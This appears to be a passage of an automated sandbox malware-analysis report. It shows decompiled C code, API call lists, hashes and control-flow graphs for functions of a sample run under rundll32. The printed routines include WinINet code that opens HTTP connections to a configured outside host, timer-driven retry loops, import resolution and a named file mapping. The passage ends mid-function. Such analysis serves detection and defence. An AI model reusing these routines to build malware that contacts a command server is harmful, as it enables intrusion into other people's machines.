                • HeapFree.KERNEL32(00000000,00000000), ref: 04B96D35
                • wsprintfA.USER32 ref: 04B96D6D
                • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04B96D88
                • GetTickCount.KERNEL32 ref: 04B96D98
                • RtlEnterCriticalSection.NTDLL(051095C0), ref: 04B96DAC
                • RtlLeaveCriticalSection.NTDLL(051095C0), ref: 04B96DCA
                  • Part of subcall function 04B95D8A: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DB5
                  • Part of subcall function 04B95D8A: lstrlen.KERNEL32(00000000,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DBD
                  • Part of subcall function 04B95D8A: strcpy.NTDLL ref: 04B95DD4
                  • Part of subcall function 04B95D8A: lstrcat.KERNEL32(00000000,00000000), ref: 04B95DDF
                  • Part of subcall function 04B95D8A: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,04B96DDD,?,76B5C740,04B96DDD,00000000,05109600), ref: 04B95DFC
                • StrTrimA.SHLWAPI(00000000,04B99294,00000000,05109600), ref: 04B96DFC
                  • Part of subcall function 04B927B3: lstrlen.KERNEL32(05109CE0,00000000,00000000,00000000,04B96E08,00000000), ref: 04B927C3
                  • Part of subcall function 04B927B3: lstrlen.KERNEL32(?), ref: 04B927CB
                  • Part of subcall function 04B927B3: lstrcpy.KERNEL32(00000000,05109CE0), ref: 04B927DF
                  • Part of subcall function 04B927B3: lstrcat.KERNEL32(00000000,?), ref: 04B927EA
                • lstrcpy.KERNEL32(00000000,?), ref: 04B96E1B
                • lstrcpy.KERNEL32(00000000,?), ref: 04B96E22
                • lstrcat.KERNEL32(00000000,?), ref: 04B96E2F
                • lstrcat.KERNEL32(00000000,00000000), ref: 04B96E33
                  • Part of subcall function 04B9469F: WaitForSingleObject.KERNEL32(00000000,746981D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 04B94751
                • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04B96E63
                • RtlFreeHeap.NTDLL(00000000,00000000,00000000), ref: 04B96E73
                • RtlFreeHeap.NTDLL(00000000,00000000,00000000,05109600), ref: 04B96E81
                • HeapFree.KERNEL32(00000000,?), ref: 04B96E92
                • RtlFreeHeap.NTDLL(00000000,00000000), ref: 04B96EA0
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
                • String ID: Uet$T1y.
                • API String ID: 186568778-1202656988
                • Opcode ID: ae9a4854c60fc9633584137213abae36f165518cd2bd82bfe4ab4b2d7096ea39
                • Instruction ID: 198c1c64a5484f604c496055e3bb71583c6f7841e59b72de0f4addb04e8f374c
                • Opcode Fuzzy Hash: ae9a4854c60fc9633584137213abae36f165518cd2bd82bfe4ab4b2d7096ea39
                • Instruction Fuzzy Hash: A171D3B1500644BFDB21AB74EE48E5B3BE8EB8D700B050566F908D3221DE3AED19DB75
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B97C28 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 126networkstringCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 92%
                			E04B97C28(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E04B96601(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E04B94130(_t56);
					} else {
						E04B94130( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E04B97BBD) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E04B9705E( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x4b9a348; // 0x56d5a8
						_t15 = _t59 + 0x4b9b73b; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}














                0x04b97c28
                0x04b97c28
                0x04b97c33
                0x04b97c3a
                0x04b97c42
                0x04b97c4c
                0x04b97c52
                0x04b97c65
                0x04b97c75
                0x04b97c67
                0x04b97c6a
                0x04b97c6f
                0x04b97c6f
                0x04b97c65
                0x04b97c85
                0x04b97c8b
                0x04b97c90
                0x04b97d79
                0x00000000
                0x04b97cab
                0x04b97cae
                0x04b97cc1
                0x04b97cc7
                0x04b97ccc
                0x04b97cf4
                0x04b97d07
                0x04b97d11
                0x04b97d14
                0x04b97d1a
                0x04b97d1f
                0x00000000
                0x00000000
                0x04b97d23
                0x04b97d2f
                0x04b97d40
                0x04b97d42
                0x04b97d53
                0x04b97d53
                0x04b97d63
                0x00000000
                0x04b97d75
                0x00000000
                0x04b97d75
                0x00000000
                0x00000000
                0x00000000
                0x04b97ccc

                APIs
                • lstrlen.KERNEL32(?,00000008,74654D40), ref: 04B97C3A
                  • Part of subcall function 04B96601: RtlAllocateHeap.NTDLL(00000000,00000000,04B964FD), ref: 04B9660D
                • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 04B97C5D
                • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 04B97C85
                • InternetSetStatusCallback.WININET(00000000,04B97BBD), ref: 04B97C9C
                • ResetEvent.KERNEL32(?), ref: 04B97CAE
                • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 04B97CC1
                • GetLastError.KERNEL32 ref: 04B97CCE
                • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 04B97D14
                • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 04B97D32
                • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 04B97D53
                • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 04B97D5F
                • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 04B97D6F
                • GetLastError.KERNEL32 ref: 04B97D79
                  • Part of subcall function 04B94130: RtlFreeHeap.NTDLL(00000000,00000000,04B9658A,00000000,?,00000000,00000000), ref: 04B9413C
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
                • String ID: @MetNet
                • API String ID: 2290446683-2109406137
                • Opcode ID: efb7fa44e45a5563a6628271ce41710a441f272a75ce5971a717f1ff8d9f75fd
                • Instruction ID: 1d7d2d642ca98cf42425c533ad4cbfedd4ec228aa41142e4ad22e2e5edf17b54
                • Opcode Fuzzy Hash: efb7fa44e45a5563a6628271ce41710a441f272a75ce5971a717f1ff8d9f75fd
                • Instruction Fuzzy Hash: 6241A9B1500604FBDB319FA1ED48E6B7BF8EF49B00F14096AB512A21A0EA34AD10DA20
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B91898 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 151timememoryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 101 4b91898-4b918ca memset CreateWaitableTimerA 102 4b91a4b-4b91a51 101->102 103 4b918d0-4b91929 _allmul SetWaitableTimer WaitForMultipleObjects 101->103 110 4b91a55-4b91a5f 102->110 104 4b9192f-4b91932 103->104 105 4b919b3-4b919b9 103->105 107 4b9193d 104->107 108 4b91934 call 4b94202 104->108 109 4b919ba-4b919be 105->109 114 4b91947 107->114 115 4b91939-4b9193b 108->115 112 4b919ce-4b919d2 109->112 113 4b919c0-4b919c2 109->113 112->109 116 4b919d4-4b919de CloseHandle 112->116 113->112 117 4b9194b-4b91950 114->117 115->107 115->114 116->110 118 4b91963-4b91990 call 4b94315 117->118 119 4b91952-4b91959 117->119 123 4b919e0-4b919e5 118->123 124 4b91992-4b9199d 118->124 119->118 120 4b9195b 119->120 120->118 126 4b91a04-4b91a0c 123->126 127 4b919e7-4b919ed 123->127 124->117 125 4b9199f-4b919af call 4b916cd 124->125 125->105 129 4b91a12-4b91a40 _allmul SetWaitableTimer WaitForMultipleObjects 126->129 127->105 128 4b919ef-4b91a02 call 4b9554c 127->128 128->129 129->117 132 4b91a46 129->132 132->105
                C-Code - Quality: 83%
                			E04B91898(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x4b9a2e0);
					_v76 = 0;
					_v80 = 0;
					L04B9837A();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x4b9a30c; // 0x2c0
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x4b9a2ec = 5;
						} else {
							_t69 = E04B94202(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x4b9a300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E04B94315( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E04B916CD(_t75,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x4b9a2e4);
							goto L21;
						} else {
							__eflags =  *0x4b9a2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E04B9554C();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x4b9a2e8);
								L21:
								L04B9837A();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x4b9a2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}
































                0x04b91898
                0x04b918ae
                0x04b918b2
                0x04b918b7
                0x04b918be
                0x04b918c4
                0x04b918ca
                0x04b91a51
                0x04b918d0
                0x04b918d0
                0x04b918d2
                0x04b918d7
                0x04b918d8
                0x04b918de
                0x04b918e2
                0x04b918e6
                0x04b918f4
                0x04b91902
                0x04b91906
                0x04b91908
                0x04b91915
                0x04b91921
                0x04b91923
                0x04b91929
                0x04b91932
                0x04b9193d
                0x04b9193d
                0x04b91934
                0x04b91934
                0x04b9193b
                0x00000000
                0x00000000
                0x04b9193b
                0x04b91947
                0x00000000
                0x04b9194b
                0x04b91950
                0x04b9195b
                0x04b9195b
                0x04b91963
                0x04b91969
                0x04b91971
                0x04b9197a
                0x04b91981
                0x04b91985
                0x04b9198a
                0x04b91990
                0x00000000
                0x00000000
                0x04b91992
                0x04b91996
                0x04b9199d
                0x00000000
                0x04b9199f
                0x04b919af
                0x04b919af
                0x00000000
                0x04b919e0
                0x04b919e0
                0x04b919e5
                0x04b91a04
                0x04b91a06
                0x04b91a0b
                0x04b91a0c
                0x00000000
                0x04b919e7
                0x04b919e7
                0x04b919ed
                0x00000000
                0x04b919ef
                0x04b919ef
                0x04b919f4
                0x04b919f6
                0x04b919fb
                0x04b919fc
                0x04b91a12
                0x04b91a12
                0x04b91a1a
                0x04b91a28
                0x04b91a2c
                0x04b91a38
                0x04b91a3a
                0x04b91a3e
                0x04b91a40
                0x00000000
                0x04b91a46
                0x00000000
                0x04b91a46
                0x04b91a40
                0x04b919ed
                0x00000000
                0x04b919e5
                0x04b919b3
                0x04b919b5
                0x04b919b9
                0x04b919ba
                0x04b919ba
                0x04b919be
                0x04b919c8
                0x04b919c8
                0x04b919ce
                0x04b919d1
                0x04b919d1
                0x04b919d8
                0x04b919d8
                0x04b91a5f
                0x00000000

                APIs
                • memset.NTDLL ref: 04B918B2
                • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04B918BE
                • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04B918E6
                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04B91906
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04B93660,?), ref: 04B91921
                • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04B93660,?,00000000), ref: 04B919C8
                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04B93660,?,00000000,?,?), ref: 04B919D8
                • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04B91A12
                • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 04B91A2C
                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04B91A38
                  • Part of subcall function 04B94202: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,051093D8,00000000,?,746AF710,00000000,746AF730), ref: 04B94251
                  • Part of subcall function 04B94202: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05109410,?,00000000,30314549,00000014,004F0053,051093CC), ref: 04B942EE
                  • Part of subcall function 04B94202: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04B91939), ref: 04B94300
                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04B93660,?,00000000,?,?), ref: 04B91A4B
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                • String ID: Uet$@MetNet
                • API String ID: 3521023985-1616585941
                • Opcode ID: a0d3bcdf7873e3637db543d628fb929abdea027235ce4c0c9afecb1c0806456e
                • Instruction ID: 7422dc273e2f3ed11c5eaf75725e5a7d7aaf6104af921d72d56a8b107af5093a
                • Opcode Fuzzy Hash: a0d3bcdf7873e3637db543d628fb929abdea027235ce4c0c9afecb1c0806456e
                • Instruction Fuzzy Hash: 13516E71108321BFEB10AF259D44D5FBBE8EB89724F108A2EF4A592250D774AD05DFA2
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B98065 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 209libraryCOMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 182 4b98065-4b980ca 183 4b980eb-4b98115 182->183 184 4b980cc-4b980e6 RaiseException 182->184 186 4b9811a-4b98126 183->186 187 4b98117 183->187 185 4b9829b-4b9829f 184->185 188 4b98139-4b9813b 186->188 189 4b98128-4b98133 186->189 187->186 190 4b98141-4b98148 188->190 191 4b981e3-4b981ed 188->191 189->188 201 4b9827e-4b98285 189->201 193 4b98158-4b98165 LoadLibraryA 190->193 194 4b9814a-4b98156 190->194 195 4b981f9-4b981fb 191->195 196 4b981ef-4b981f7 191->196 197 4b981a8-4b981b4 InterlockedExchange 193->197 198 4b98167-4b98177 193->198 194->193 194->197 199 4b98279-4b9827c 195->199 200 4b981fd-4b98200 195->200 196->195 206 4b981dc-4b981dd FreeLibrary 197->206 207 4b981b6-4b981ba 197->207 213 4b98179-4b98185 198->213 214 4b98187-4b981a3 RaiseException 198->214 199->201 202 4b9822e-4b9823c 200->202 203 4b98202-4b98205 200->203 204 4b98299 201->204 205 4b98287-4b98294 201->205 202->199 219 4b9823e-4b9824e 202->219 203->202 211 4b98207-4b98212 203->211 204->185 205->204 206->191 207->191 212 4b981bc-4b981c8 LocalAlloc 207->212 211->202 215 4b98214-4b9821a 211->215 212->191 217 4b981ca-4b981da 212->217 213->197 213->214 214->185 215->202 218 4b9821c-4b9821f 215->218 217->191 218->202 221 4b98221-4b9822c 218->221 223 4b9825a-4b9825c 219->223 224 4b98250-4b98258 219->224 221->199 221->202 223->199 225 4b9825e-4b98276 RaiseException 223->225 224->223 225->199
                C-Code - Quality: 51%
                			E04B98065(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				struct HINSTANCE__* _t99;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x4b90000;
				_t115 = _t139[3] + 0x4b90000;
				_t131 = _t139[4] + 0x4b90000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x4b90000;
				_v16 = _t139[5] + 0x4b90000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x4b90002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x4b9a1c0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x4b9a1c0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x4b9a1c0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x4b9a1bc; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x4b9a1c0; // 0x0
					if(_t98 == 0) {
						L9:
						_t99 = LoadLibraryA(_v60); // executed
						_t138 = _t99;
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x4b9a1b8; // 0x0
										 *_t102 = _t125;
										 *0x4b9a1b8 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x4b9a1bc; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}


































                0x04b98074
                0x04b9808a
                0x04b98090
                0x04b98092
                0x04b98097
                0x04b9809d
                0x04b980a2
                0x04b980a5
                0x04b980b3
                0x04b980ba
                0x04b980bd
                0x04b980c0
                0x04b980c1
                0x04b980c4
                0x04b980c7
                0x04b980ca
                0x04b980cf
                0x04b980de
                0x00000000
                0x04b980e4
                0x04b980ee
                0x04b980f8
                0x04b980fd
                0x04b980ff
                0x04b98109
                0x04b9810c
                0x04b9810f
                0x04b98115
                0x04b98117
                0x04b98117
                0x04b9811a
                0x04b9811d
                0x04b98122
                0x04b98126
                0x04b98139
                0x04b9813b
                0x04b981e3
                0x04b981e3
                0x04b981ea
                0x04b981ed
                0x04b981f7
                0x04b981f7
                0x04b981fb
                0x04b98279
                0x04b9827c
                0x04b9827e
                0x04b9827e
                0x04b98285
                0x04b98287
                0x04b98291
                0x04b98294
                0x04b98297
                0x04b98297
                0x00000000
                0x04b981fd
                0x04b98200
                0x04b9822e
                0x04b98238
                0x04b9823c
                0x04b98244
                0x04b98247
                0x04b9824e
                0x04b98258
                0x04b98258
                0x04b9825c
                0x04b98261
                0x04b98270
                0x04b98276
                0x04b98276
                0x04b9825c
                0x00000000
                0x04b98207
                0x04b9820a
                0x04b98212
                0x04b98227
                0x04b9822c
                0x00000000
                0x00000000
                0x04b9822c
                0x00000000
                0x04b98212
                0x04b98200
                0x04b981fb
                0x04b98141
                0x04b98148
                0x04b98158
                0x04b9815b
                0x04b98161
                0x04b98165
                0x04b981a8
                0x04b981b4
                0x04b981dd
                0x04b981b6
                0x04b981ba
                0x04b981c0
                0x04b981c8
                0x04b981ca
                0x04b981cd
                0x04b981d3
                0x04b981d5
                0x04b981d5
                0x04b981c8
                0x04b981ba
                0x00000000
                0x04b981b4
                0x04b9816d
                0x04b98170
                0x04b98177
                0x04b98187
                0x04b9818a
                0x04b9819a
                0x00000000
                0x04b981a0
                0x04b98181
                0x04b98185
                0x00000000
                0x00000000
                0x00000000
                0x04b98185
                0x04b98152
                0x04b98156
                0x00000000
                0x00000000
                0x00000000
                0x04b98156
                0x04b9812f
                0x04b98133
                0x00000000
                0x00000000
                0x00000000

                APIs
                • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04B980DE
                • LoadLibraryA.KERNEL32(?), ref: 04B9815B
                • GetLastError.KERNEL32 ref: 04B98167
                • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04B9819A
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.773425121.0000000004B91000.00000020.10000000.00040000.00000000.sdmp, Offset: 04B90000, based on PE: true
                • Associated: 00000003.00000002.773417439.0000000004B90000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773435246.0000000004B99000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773440872.0000000004B9A000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.773449599.0000000004B9C000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4b90000_rundll32.jbxd
                Similarity
                • API ID: ExceptionRaise$ErrorLastLibraryLoad
                • String ID: $$@MetNet
                • API String ID: 948315288-3365357938
                • Opcode ID: be7d853429fe6daeb3d63c47e63279469f40de7c39d709ccf0de756a67f18e5f
                • Instruction ID: 63c20b5397a04e97f0aaa4efb84019710cbc778a3676a976cd2cf10c2ebb55cc
                • Opcode Fuzzy Hash: be7d853429fe6daeb3d63c47e63279469f40de7c39d709ccf0de756a67f18e5f
                • Instruction Fuzzy Hash: AC813875A10609AFDF14DFA9D984AAEBBF4FB49300F10806AE905E7340EB74ED04CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04B94B7B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72filetimeCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 74%
                			E04B94B7B(intOrPtr __edx, void** _a4, void** _a8) {
				intOrPtr _v8;
				struct _FILETIME* _v12;
				short _v56;
				struct _FILETIME* _t12;
				intOrPtr _t13;
				void* _t17;
				void* _t21;
				intOrPtr _t27;
				long _t28;
				void* _t30;

				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L04B98374();
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x4b9a348; // 0x56d5a8
				_t5 = _t13 + 0x4b9b87a; // 0x5108e22
				_t6 = _t13 + 0x4b9b594; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L04B97FDA();
				_t17 = CreateFileMappingW(0xffffffff, 0x4b9a34c, 4, 0, 0x1000,  &_v56); // executed
				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) {
